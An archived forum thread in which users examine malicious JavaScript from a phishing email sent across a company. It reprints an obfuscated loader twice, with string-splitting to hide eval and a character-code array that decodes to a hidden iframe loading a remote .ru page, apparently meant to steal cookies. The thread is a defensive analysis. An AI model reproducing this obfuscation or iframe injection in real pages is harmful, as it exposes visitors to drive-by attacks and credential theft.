PDA

View Full Version : Evil Javascript



footballjds
02-17-2012, 04:03 PM
DO NOT RUN ANYTHING IN THE ZIP UNLESS YOU KNOW WHAT YOU ARE DOING
Hello all,

I'd like some help understanding what this virus is doing.
An email was sent out en mass to my entire company. It contained a .htm with encrypted crap. I was able to figure out the URL of the site and got the source.(wget in linux)

I used JSBeautifier to make it readable and the attached is what I have.
Please use caution. Every file is labeled correctly.

I edited the Java Script to alert me instead of actually running the script(it opens a Russian website in an iframe, after looking through the source of the Russian site I'm guessing it's trying to steal all my cookies).

let me know what you see (:

masterBB
02-17-2012, 04:31 PM
Highly suspicious. Reformated the code in the js. Note that I've no idea what it does since I try to stay away from javascript.



if(window['d'+'o'+'c'+'ument'])
aa=/\w/.exec(new Date()).index+[];

aaa='0';

if(aa.indexOf(aaa)!==-1)
f=[-30,-30,66,63,-7,1,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70 ,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72, 61,82,0,2,52,9,54,2,84,-30,-30,-30,66,63,75,58,70,62,75,1,2,20,-30,-30,86,-7,62,69,76,62,-7,84,-30,-30,-30,61,72,60,78,70,62,71,77,7,80,75,66,77,62,1,-5,21,66,63,75,58,70,62,-7,76,75,60,22,0,65,77,77,73,19,8,8,60,76,62,75,66, 70,58,71,68,75,58,7,75,78,19,17,9,17,9,8,66,70,58, 64,62,76,8,58,78,59,69,59,83,61,71,66,7,73,65,73,0 ,-7,80,66,61,77,65,22,0,10,9,0,-7,65,62,66,64,65,77,22,0,10,9,0,-7,76,77,82,69,62,22,0,79,66,76,66,59,66,69,66,77,8 2,19,65,66,61,61,62,71,20,73,72,76,66,77,66,72,71, 19,58,59,76,72,69,78,77,62,20,69,62,63,77,19,9,20, 77,72,73,19,9,20,0,23,21,8,66,63,75,58,70,62,23,-5,2,20,-30,-30,86,-30,-30,63,78,71,60,77,66,72,71,-7,66,63,75,58,70,62,75,1,2,84,-30,-30,-30,79,58,75,-7,63,-7,22,-7,61,72,60,78,70,62,71,77,7,60,75,62,58,77,62,30,6 9,62,70,62,71,77,1,0,66,63,75,58,70,62,0,2,20,63,7 ,76,62,77,26,77,77,75,66,59,78,77,62,1,0,76,75,60, 0,5,0,65,77,77,73,19,8,8,60,76,62,75,66,70,58,71,6 8,75,58,7,75,78,19,17,9,17,9,8,66,70,58,64,62,76,8 ,58,78,59,69,59,83,61,71,66,7,73,65,73,0,2,20,63,7 ,76,77,82,69,62,7,79,66,76,66,59,66,69,66,77,82,22 ,0,65,66,61,61,62,71,0,20,63,7,76,77,82,69,62,7,73 ,72,76,66,77,66,72,71,22,0,58,59,76,72,69,78,77,62 ,0,20,63,7,76,77,82,69,62,7,69,62,63,77,22,0,9,0,2 0,63,7,76,77,82,69,62,7,77,72,73,22,0,9,0,20,63,7, 76,62,77,26,77,77,75,66,59,78,77,62,1,0,80,66,61,7 7,65,0,5,0,10,9,0,2,20,63,7,76,62,77,26,77,77,75,6 6,59,78,77,62,1,0,65,62,66,64,65,77,0,5,0,10,9,0,2 ,20,-30,-30,-30,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70, 62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,6 1,82,0,2,52,9,54,7,58,73,73,62,71,61,28,65,66,69,6 1,1,63,2,20,-30,-30,86];

md='a';
e=window['e'+'val'];
w=f;
s='';
fr='f'+'ro'+'mChar';
r=String[fr+'Code'];

for(i=0;i-w.length<0;i++){
j=i;
s=s+r(39+w[j]);
}

if(aa.indexOf(aaa)!==-1)
alert(s);


But note the way it inits strings...

footballjds
02-17-2012, 04:45 PM
Highly suspicious. Reformated the code in the js. Note that I've no idea what it does since I try to stay away from javascript.



if(window['d'+'o'+'c'+'ument'])
aa=/\w/.exec(new Date()).index+[];

aaa='0';

if(aa.indexOf(aaa)!==-1)
f=[-30,-30,66,63,-7,1,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70 ,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72, 61,82,0,2,52,9,54,2,84,-30,-30,-30,66,63,75,58,70,62,75,1,2,20,-30,-30,86,-7,62,69,76,62,-7,84,-30,-30,-30,61,72,60,78,70,62,71,77,7,80,75,66,77,62,1,-5,21,66,63,75,58,70,62,-7,76,75,60,22,0,65,77,77,73,19,8,8,60,76,62,75,66, 70,58,71,68,75,58,7,75,78,19,17,9,17,9,8,66,70,58, 64,62,76,8,58,78,59,69,59,83,61,71,66,7,73,65,73,0 ,-7,80,66,61,77,65,22,0,10,9,0,-7,65,62,66,64,65,77,22,0,10,9,0,-7,76,77,82,69,62,22,0,79,66,76,66,59,66,69,66,77,8 2,19,65,66,61,61,62,71,20,73,72,76,66,77,66,72,71, 19,58,59,76,72,69,78,77,62,20,69,62,63,77,19,9,20, 77,72,73,19,9,20,0,23,21,8,66,63,75,58,70,62,23,-5,2,20,-30,-30,86,-30,-30,63,78,71,60,77,66,72,71,-7,66,63,75,58,70,62,75,1,2,84,-30,-30,-30,79,58,75,-7,63,-7,22,-7,61,72,60,78,70,62,71,77,7,60,75,62,58,77,62,30,6 9,62,70,62,71,77,1,0,66,63,75,58,70,62,0,2,20,63,7 ,76,62,77,26,77,77,75,66,59,78,77,62,1,0,76,75,60, 0,5,0,65,77,77,73,19,8,8,60,76,62,75,66,70,58,71,6 8,75,58,7,75,78,19,17,9,17,9,8,66,70,58,64,62,76,8 ,58,78,59,69,59,83,61,71,66,7,73,65,73,0,2,20,63,7 ,76,77,82,69,62,7,79,66,76,66,59,66,69,66,77,82,22 ,0,65,66,61,61,62,71,0,20,63,7,76,77,82,69,62,7,73 ,72,76,66,77,66,72,71,22,0,58,59,76,72,69,78,77,62 ,0,20,63,7,76,77,82,69,62,7,69,62,63,77,22,0,9,0,2 0,63,7,76,77,82,69,62,7,77,72,73,22,0,9,0,20,63,7, 76,62,77,26,77,77,75,66,59,78,77,62,1,0,80,66,61,7 7,65,0,5,0,10,9,0,2,20,63,7,76,62,77,26,77,77,75,6 6,59,78,77,62,1,0,65,62,66,64,65,77,0,5,0,10,9,0,2 ,20,-30,-30,-30,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70, 62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,6 1,82,0,2,52,9,54,7,58,73,73,62,71,61,28,65,66,69,6 1,1,63,2,20,-30,-30,86];

md='a';
e=window['e'+'val'];
w=f;
s='';
fr='f'+'ro'+'mChar';
r=String[fr+'Code'];

for(i=0;i-w.length<0;i++){
j=i;
s=s+r(39+w[j]);
}

if(aa.indexOf(aaa)!==-1)
alert(s);


But note the way it inits strings...

maybe i wasn't clear. I already edited the .htm(put alert instead of e so it alerted me instead of evaluating the code.)
The .txt in there is the source code of the russian website that the .htm opens in an iframe.

I'd like to know what the russian website does. It's something with google cookies.

Home
02-17-2012, 05:08 PM
Wrong thread.


On topic. I have seen similar like that in past, I will try search it.


~Home

footballjds
02-17-2012, 06:00 PM
Wrong thread.
:confused:

n thanks for trying to look into it